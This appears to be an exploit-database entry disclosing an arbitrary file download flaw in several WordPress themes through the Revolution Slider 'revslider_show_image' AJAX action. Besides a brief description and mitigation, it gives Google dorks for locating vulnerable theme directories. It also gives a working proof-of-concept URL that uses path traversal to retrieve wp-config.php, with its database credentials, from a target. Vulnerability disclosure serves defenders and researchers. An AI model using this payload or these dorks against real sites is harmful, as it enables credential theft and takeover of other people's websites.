WordPress CuckooTap Theme & eShop Arbitrary File Download

vendor:

CuckooTap Theme & eShop, IncredibleWP Theme, Ultimatum Theme, Medicate Theme, Centum Theme, Avada Theme, Striking Theme & E-Commerce, Beach Apollo

by:

Hugo Santiago

7,5

CVSS

HIGH

Arbitrary File Download

200

CWE

Product Name: CuckooTap Theme & eShop, IncredibleWP Theme, Ultimatum Theme, Medicate Theme, Centum Theme, Avada Theme, Striking Theme & E-Commerce, Beach Apollo

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 7 and Gnu/Linux

2014

WordPress CuckooTap Theme & eShop Arbitrary File Download

Multiple WordPress themes are vulnerable to an arbitrary file download vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable server. This can allow an attacker to download any file from the server, including sensitive files such as wp-config.php, which contains the database credentials.

Mitigation:

Ensure that the web server is configured to deny access to sensitive files, and that all WordPress themes are up to date.

Source

Exploit-DB raw data:

# WordPress CuckooTap Theme & eShop Arbitrary File Download
# Risk: High
# CWE number: CWE-200
# Author: Hugo Santiago
# Contact: hugo.s@linuxmail.org
# Date: 31/08/2014
# Vendor Homepage: http://themeforest.net/item/cuckootap-one-page-parallax-wp-theme-plus-eshop/3512405
# Tested on: Windows 7 and Gnu/Linux
# Google Dork: "Index of" +/wp-content/themes/cuckootap/

# WordPress IncredibleWP Theme Arbitrary File Download
# Vendor Homepage: http://freelancewp.com/wordpress-theme/incredible-wp/
# Google Dork: "Index of" +/wp-content/themes/IncredibleWP/

# WordPress Ultimatum Theme Arbitrary File Download
# Vendor Homepage: http://ultimatumtheme.com/ultimatum-themes/s
# Google Dork: "Index of" +/wp-content/themes/ultimatum

# WordPress Medicate Theme Arbitrary File Download
# Vendor Homepage: http://themeforest.net/item/medicate-responsive-medical-and-health-theme/3707916
# Google Dork: "Index of" +/wp-content/themes/medicate/

# WordPress Centum Theme Arbitrary File Download
# Vendor Homepage: http://themeforest.net/item/centum-responsive-wordpress-theme/3216603
# Google Dork: "Index of" +/wp-content/themes/Centum/

# WordPress Avada Theme Arbitrary File Download
# Vendor Homepage: http://themeforest.net/item/avada-responsive-multipurpose-theme/2833226
# Google Dork: "Index of" +/wp-content/themes/Avada/

# WordPress Striking Theme & E-Commerce Arbitrary File Download
# Vendor Homepage: http://themeforest.net/item/striking-multiflex-ecommerce-responsive-wp-theme/128763
# Google Dork: "Index of" +/wp-content/themes/striking_r/

# WordPress Beach Apollo Arbitrary File Download
# Vendor Homepage: https://www.authenticthemes.com/theme/apollo/
# Google Dork: "Index of" +/wp-content/themes/beach_apollo/


PoC:

http://victim/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php